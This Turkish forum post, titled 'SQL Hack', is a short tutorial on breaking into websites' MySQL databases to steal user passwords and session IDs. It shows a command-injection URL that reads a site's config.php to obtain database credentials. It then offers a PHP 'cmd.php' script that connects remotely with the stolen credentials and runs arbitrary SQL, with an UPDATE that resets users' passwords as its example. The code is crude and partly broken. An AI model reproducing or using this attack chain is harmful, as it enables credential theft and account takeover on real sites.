SQL Hack
-
Bildiginiz gibi SQL Verileri ve En önemLisi kullanıcıların şifrelerini HASH veya Normal olarak saklamaktadır. SQL İnjection Dışında SQL ile bağlantı yapabilirsek Kullanıcıların şifrelerini veya SessionID'lerini ve Diğer Bilgilerini Çalabiliriz. Öncelikle Yapmamız Gereken SQL'e Connect Yapmaktır.
Öncelikle Connect yapabilmek için Bilmemiz Gereken
MYSQL Connect komutuKod:<?php
mysql_connect('localhost', 'user', 'pass');
?>
Buraya kadar Normal Fakat Şu mantığı Düşünürsek;
Eğer MYSQL kullanıcı ismi ve şifresi elimize geçti ise, neler Yapabiliriz..
Hatırlarsanız PHP-Nuke'nin bir açığı var idi veya Diğer Scriptlerin SHELL Komutlarını kullandırabildigimiz bir komutta vardı.
Örnegin Deneme Sayfasında SHELL komutlarını kullanabilecegimiz bir açıga sahip olan bir siteyi düşünelim..
www.deneme.com/test.php?|cat%20config.php|
Şifreyi Öğrendiğimizi Farz Edersek
user: test
pass: salla
Şimdi ise Yapacagimiz Bir SQL Komutlarını CMD Formu ve cmd.php Hazırlamak Olacaktır
CMD Formunu olusturmasını size bırakıyorum ve cmd.php için bir örnek veriyorum.
SQL Uzaktan Bağlantı Mantıgına Göre Aşagıda ki GibidirKod:mysql_connect('http://site.com', 'test', 'salla');Alıntı:<?php
$hackle = mysql_connect('$hedef', '$user', '$pass');
$sorgu = $cmd; // Şu Sekilde Yollayın: "UPDATE usertable SET pwd='$pwd' WHERE uid='$uid';";
if (!$hackle) {
die('Veritabanına Ulaşılamiyor Nedeni: ' . mysql_error());
}
else { echo 'Veritabanına Ulaşım Sağlandı..';
mysql_query($sorgu);
}
?>alıntıdır
Toplam Hit: 1476 Toplam Mesaj: 1
